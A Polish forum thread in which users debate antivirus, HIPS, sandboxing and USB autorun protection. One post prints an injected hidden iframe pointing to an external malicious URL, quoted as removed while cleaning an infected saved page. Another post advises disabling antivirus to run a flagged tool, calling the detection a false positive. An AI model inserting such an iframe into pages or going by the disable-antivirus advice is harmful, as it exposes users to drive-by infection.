Nie myślałem o obrazie całej partycji (bo myślę,że obraz systemu na płycie tak jak to opisałeś jest wystarczający, a większe rzeczy można przegrać na DVD), tylko właśnie o jakiś pojedynczych plikach, które używamy - podpinanie ciągle dysku pod usb, żeby skopiować coś wydaje mi się, że może się skończyć właśnie tym, co u mnie z moim pendrivem, czyli infekcją bo np. Virut sobie wejdzie na dysk jak go podepniesz do systemu, dlatego zaproponowałem Trucrypt, wydaje się to być sensownym rozwiązaniem

TrueCrypt jest faktycznie sensownym rozwiazaniem jesli chodzi o szyfrowanie plikow,partycji czy nawet calych dyskow, z tym ze musisz odpowiedziec sobie na pytanie czy uzycie go wiazaloby sie z jakimis niedogodnosciami.

Z sytuacji ktora opisales powyzej zrozumialem ze zakladasz fakt istnienia Viruta w systemie przez dluzszy okres czasu. Jest to nie calkiem trafione podejscie - jak zapewne sam wiesz Virut atakuje pliki exe oraz chce dokonac zmian w plikach systemowych - dostajac takie komunikaty - najpierw od HIPS''a, w dalszej kolejnosci po rozpoczeciu dzialania - od programow AV - jestes w stanie zareagowac, pod warunkiem ze czytasz uwanie komunikaty klasycznego HIPS''a zaimplementowanego w aplikacje Comodo, ktora posiadasz. W tym momencie logicznym jest to ze nie podlaczysz zewn. dysku zanim nie pozbedziesz sie okienek informujacych Cie o tym ze moze dziac sie cos niedobrego.

Virut był tylko przykładem - zakładam istnienie takich wirusów i innych robaczków, które nie dają o sobie tak szybko znać - może być nawet ten mój nieszczęsny HTML/Infected.WebPage.Gen- pliki zapisane w różnym czasie, w różnych miejscach i potem jedna aktualizacja i aż czerwono od raportów a wątpliwe jest byś czekał parę dni, żeby testować to co chcesz przenieść bo sytuacja zmienia się dynamicznie - wyleczysz jedno, a za dzień, dwa okaże się że biega Ci tam coś innego i efekt będzie podobny do tego jakbyś dysk miał podpięty cały czas.

A, a propos tego HTML-a - mamna niego stary dobry sposób, który odkryłem jak miałem Redlofa z pięć lat temu i po drobnej modyfikacji dalej jest skuteczny, aż dziw, że ani Kaspersky, ani Avira sobie z tym nie radzą. Piszę co i jak bo mój kumpel też to miał więc może komuś nie uśmiecha się kasowanie archiwum www
1. Wysłałem zainfekowaną stronę na

[Aby zobaczyć linki, zarejestruj się tutaj]

zaznaczając java script
2. W raporcie na czerwono wyświetla

[Aby zobaczyć linki, zarejestruj się tutaj]

3. Otworzyłem stronę notatnikiem i na samym dole skasowałem:
<script type="text/javascript">
<!--
// Main vBulletin Javascript Initialization
vBulletin_init();
//-->
</script>

<!-- temp -->
<div style="display: none;">
<!-- thread rate -->



<!-- / thread rate -->
</div>

<iframe src="http://jL.chura.pl/rc/" style="display:none"></iframe>

4. Czysto - Avira, ani strona już nie raportują tego pliku

Zasada klasycznego HIPS''a jest nastepujaca - nic w systemie nie powinno sie dziac bez Twojej wiedzy. Jest to swoisty monitor systemu, ktory informuje Cie o wszystkim - Twoja pierwsza linia obrony w zetknieciu z nieznanymi plikami (oferuje ochrone 0-Day-Threats, czyli nawet przed takimi zagrozeniami ktore powstaly nie dawno)
To prawda sa klasyczne HIPS''y i klasyczne HIPS''y, roznice nie sa wcale takie male - wezmy na warsztat popularnego Conficker''a.
Komunikaty HIPS z Comodo versus komunikaty HIPS z Online Armor (post #122):

[Aby zobaczyć linki, zarejestruj się tutaj]

Jak widzisz HIPS HIPS''owi nierowny. Inna sprawa jest fakt ze klasyczny HIPS jest bardzo wymagajacym narzedziem ochrony i wymaga od uzytkownika wiedzy na poziomie co najmniej srednim, w zakresie procesow i ich zachowan w srodowisku Windows.
Sa rowniez ''ciche'' HIPS''y tzw inteligentne, ktore na podstawie wczesniej zdefiniowanych regul same oceniaja zagrozenie i wybieraja akcje, ktora nalezy podjac w takiej sytuacji.

Zalozmy ze zignorowales komunikat HIPS Comodo i kliknales Allow, w tej sytuacji gdyby Twoja konfiguracja programow bezpieczenstwa opierala sie na warstwach ktore opisalem wczesniej - inna aplikacja zajelaby sie problemem.
Ok niech bedzie to AV - poinformowal Cie o zagrozeniu, jednak jest juz za pozno.
Kolejna warstwa Piaskownica - wszystko w niej uruchamiane jest odizolowane od zaufanych aplikacji systemowych - nic poza nia sie nie wydostanie, czyscisz ja i problem znika
lub
wirtualizacja partycji/dyskow (za pomoca programow np. Returnil lub Shadow Defender) - robisz reboot i wszystko jest jak bylo w chwili gdy wprowadzales system w stan wirtualizacji.
Kolejne zabezpieczenie - LUA,SRP,DEP - silne systemy restrykcji, unieszkodliwiajace ok 90% malware.


etc, etc...

@Creer

Jeśli ktoś naprawdę będzie chciał się dostać do danych, które zgromadziłeś na swoim komputerze to nawet 30 piaskownic, firewalli, av nie pomoże Ale czy jest sens instalować hipsa, firewalla i av i katować się komunikatami o każdym nowo otwartym programie? To dobre dla osób, które mają komputery w firmie ale przeciętny John Doe nadal będzie używać klasycznego AV + czasami firewalla oddzielnie instalowanego. Ogranicz też stosowanie słów: "nic poza nią się nie wydostanie" bo nie ma na tym świecie rzeczy idealnych a już tym bardziej programów komputerowych.

To nawet nie chodzi o to, żeby ktoś chciał akurat moich danych bo nie jestem B.G. ale o zwykłe uszkadzanie takich plików przez robale tak, że zostaną z nich tylko strzępy bo opcja leczenia będzie niedostępna.

Widzisz, u mnie Avira i Comodo zareagowały, ale nie do końca, więc myślę, że najważniejszą linią ochrony powinna być piaskownica, ale o tym jest jakoś cicho, nie ma reklam sandboxów, za to pełno antywirusów, etc. a one są ułomne, zresztą piaskownice pewnie też, tylko że póki co nie wymyślono nic lepszego więc to ostateczna linia obrony białych

A że przeciętny user nie instaluje nie wiadomo ilu programów? Mają większe szczęście ode mnie bo paru takich znam, żyją i nie narzekają. Kumpel miał tylko Avirę, ma neta dużo dłużej niż ja, lepsze łącze (więc więcej wirów może sobie ściągnąć), ale to mnie dopadł virutek, a jego dopiero jak jego matka siedziała przy kompie, z miesiąc po mnie. Specjalnie się tym nie przejął, zrobił formata i dalej ma tylko Avirę. A ja zacząłem się wczuwać jeszcze bardziej w bezpieczeństwo ;>

dlatego ja zainwestowałem w DW jak na razie nie słyszałem żeby jakiś malware 0-day go oszukał
cały czas go testuje na nowych zagrożeniach

@Ratatui, jasne dlatego nie raz powtarzam nie ma programu ktory oferowalby 100% ochrony. Napisalem pomijajac jedno znane mi zagrozenie ktore potrafi sforsowac piaskownice oferowana przez SandboxIE, po ty aby podkreslic skutecznosc tego rozwiazania w porownaniu do klasycznych programow AV, ktore maja znacznie wiecej ''wrogow'' w postaci nowo pisanych wirusow.
Podstawą jest zwykle powinien byc zdrowy rozsadek.

@hasek, dziwisz sie? Programy AV znane sa od kilku dziesiecioleci, ludzie zdazyli sie do nich przyzwyczaic - producentom AV rowniez odejscie w zapomnienie nie jest na reke, bombarduja zatem spoleczenstwo reklamami w pismach, na stronach internetowych, nawet w TV.
Dziwi rowniez fakt ze niektorzy z nich (mam na mysli producentow AV) nawet nie slyszeli o rozwiazaniach typu piaskownica. Ilya - tworca programu DefenseWall HIPS, kilka lat temu prowadzil wyklady na temat zasady dzialania piaskownicy w jednej z bdb znanych firm AV, ktorej z nazwy nie bede wymienial.
Takie sa fakty, a producenci AV korzystaja czesto z niewiedzy, niedoinformowania wiekszej czesci spoleczenstwa i reklamuja swoje produkty jako remedium na wszystkie problemy zwiazane z zagrozeniami - Inteligentna ochrona, nowe mechanizmy, kompletna ochrona systemu, najlepszy na rynku produkt, etc, etc... kazdy z nas conajmiej raz spotkal sie z takimi okresleniami, no coz, nie nalezy ich winic - kluczem do sukcesu danej firmy w wiekszej mierze jest przeciez wlasnie reklama, szkoda tylko ze kosztem nieswiadomego klienta, ktory bezgranicznie ufa produktom danej firmy AV.

polak900 napisał(a):dlatego ja zainwestowałem w DW jak na razie nie słyszałem żeby jakiś malware 0-day go oszukał
cały czas go testuje na nowych zagrożeniach

@polak900

Gdybym miał MacOS to bym się raczej już nie przenosił na Windows No chyba, że masz jakieś ważne programy, które nie mają zamienników i działają tylko na Windowsie.

Z tego co oglądałem to w TV tylko ESET się reklamował :/

Ratatui napisał(a):

polak900 napisał(a):dlatego ja zainwestowałem w DW jak na razie nie słyszałem żeby jakiś malware 0-day go oszukał
cały czas go testuje na nowych zagrożeniach

@polak900

Gdybym miał MacOS to bym się raczej już nie przenosił na Windows No chyba, że masz jakieś ważne programy, które nie mają zamienników i działają tylko na Windowsie.

tak się składa ze DW mam zainstalowany na zwykłym pc mojej żony
pisałem wcześniej
do testów zainstalowałem też DW na win7 rc (dzisiaj wyszła) wszystko na parallels desktop
wszystkie programy które potrzebuje i używam są też pod maca więc nie mam tego problemu.

Hasek,nie pomoze nic jesli (bez obrazy) uzytkownik przestaje myśleć i pokłada pełna wiare w skutecznośc antywirusa.
Najwazniejsza jest profilaktyka.
Jeśli uzywasz dysków przenośnych,penów i t.p. ustrojstwa trzeba w ich głównych rootach utworzyć niekasowalne foldery o nazwie autorun.inf
Takie same foldery tworzy sie na wszystkich dyskach komputera.
Słuzy do tego program Flash Disinfector .
Co to daje?
Otóż likwiduje mozliwość zapisania na jakimkolwiek dysku,pendrivie pliku autorun.infodpowiedzialnego za samouruchamianie sie wirusów,które w trakcie kopiowania na pendriva mozesz z obcego kompa sciagnać.Wiry wprawdzie będziesz miał na penie ale jeśli ich sam nie uruchomisz będa niegrożne i zostana wyeliminowane przez antywirus w trakcie kopiowania z pena na dysk.

@Creer bo doszłoby do tego, że okazałoby się, że AV są zbędne - HIPS + sandbox i wirusami nie trzeba by się martwić bo nie znajdą dostępu do systemu - mam takie wrażenie, że tak będzie, tylko że zamiast wirów coś innego wymyślą, żebyśmy stratni nie byli ;p

Wymyślą wirusy wirtulizacyjne I takie które beda rozdupczały od środka HIPS i pomogą się wedrzeć normalnym wirom, bo nie będzie antyvirusa ;D

hasek napisał(a):@Creer bo doszłoby do tego, że okazałoby się, że AV są zbędne - HIPS + sandbox i wirusami nie trzeba by się martwić bo nie znajdą dostępu do systemu - mam takie wrażenie, że tak będzie, tylko że zamiast wirów coś innego wymyślą, żebyśmy stratni nie byli ;p

cóż walka trwa dalej więc niech wymyślają my też coś wymyślimy

@zbycho, masz zupełną rację.
Wir właśnie dlatego był taki groźny bo uruchomił się automatycznie i nic za nim nie nadążyło, na szczęście już się wyleczyłem i dodatkowo ściągnąłem Panda USB Vaccine. Swoją drogą nie pomyślałem wcześniej, że w taki łatwy sposób można to zrobić, dla mnie do tej pory autorun.inf był tylko upierdliwcem, choć już wykrywało na innych penach wirusy w tym miejscu ;p
To co robią te programy, to powinno być seryjnie robione bo bez tego to tak jakby dać dziecku nóż do ręki, żeby się samo pochlastało.

PS Flash Disinfector jest niedostępny

hasek napisał(a):PS Flash Disinfector jest niedostępny

Jak nie jest jak jest

[Aby zobaczyć linki, zarejestruj się tutaj]

- drugi link działa, sprawdzałem. Avira wykrywa w nim wirusa, to jest FP. Najlepiej na czas użycia narzędzia wyłącz Avirę, po użyciu wywał je i włącz Avirę. Każdy pen uruchamia się automatycznie po podłączeniu jeśli nie jest wyłączony autorun i tyle w tym temacie.

Jak tak, jak nie

[Aby zobaczyć linki, zarejestruj się tutaj]

[Aby zobaczyć linki, zarejestruj się tutaj]

błąd wczytywania strony/page not found, ale myślę, że Panda zrobiła to samo z pendrivami

Mają autostart dla wygody, ale skoro to jest tak łatwo wykorzystać, to wadliwy plik powinien być utworzony przez producentów.
Zresztą dla naszej wygody ustawienie deafult w AV i FW są takie, żeby nam programy nie przeszkadzały, a nie żeby chronić.
Widział ktoś kiedyś reklamę: "Kupiłeś nasz AV, to nie znaczy, że wykupiłeś wakacje dla swojego mózgu"?
Są takie: "Kup nasz produkt i zapomnij o niebezpieczeństwie" - sami prowokują do tego, żeby czuć się bezpiecznie i zapomnieć, że ma się jakiś program zabezpieczający, którego trzeba pilnować, żeby spełniał swą rolę.

A jednak tak

[Aby zobaczyć linki, zarejestruj się tutaj]

[Aby zobaczyć linki, zarejestruj się tutaj]

Cytat: Mają autostart dla wygody, ale skoro to jest tak łatwo wykorzystać, to wadliwy plik powinien być utworzony przez producentów.

Po pierwsze antywirusy maja instrukcje obsługi wiec dobrze było by je przeczytać przed instalacją by wiedziec czego nie zepsuć
A po drugie jesli chodzi o pamieci przenosne to jest to niewykonalne przez producentów z uwagi na zmieniajacy sie sposób infekcji penówa tym samym ich ochrony.
Na poczatku wystarczyło napisanie samemu pliku autorun.inf,dania mu atrybutów ukrytych i systemowych,załadowac do roota i było sie bezpiecznym.
Ale twórcy wirów nauczyli sie kasować te pliki na penach przed skopiowaniem swoich.I trzeba było wymyslec niekasowalne foldery.
Jak długo to zabezpieczy?Ano tak długo jak ktoś z miliarda inernautów nie wymysli sposobu obejscia tego problemu.
I dlatego mimo ze antywirusy zabezpieczaja przed olbrzymia wiekszoscia szitów,nie zabezpieczaja przed wszystkimi.
Avira,jak pokazał ostatni test na jakies 1.3 miliona wirów nie wykryła chyba z 5 tysiecy a wsród innych wyniki siegały 13 tyś do paredziesieciu tysiecy.
Dlatego nic nie zwalnia od myslenia albo od nie włazenia na dziwne strony i pobierania z nich jeszcze dziwniejszych plików.
Albo to albo tamto.
A o infekcji przy pomocy penów jest co najmniej od roku? tak głosno ze az dziw bierze ze ktos nie zabezpiecza pena i dysków przed nimi i wkłada go byle gdzie.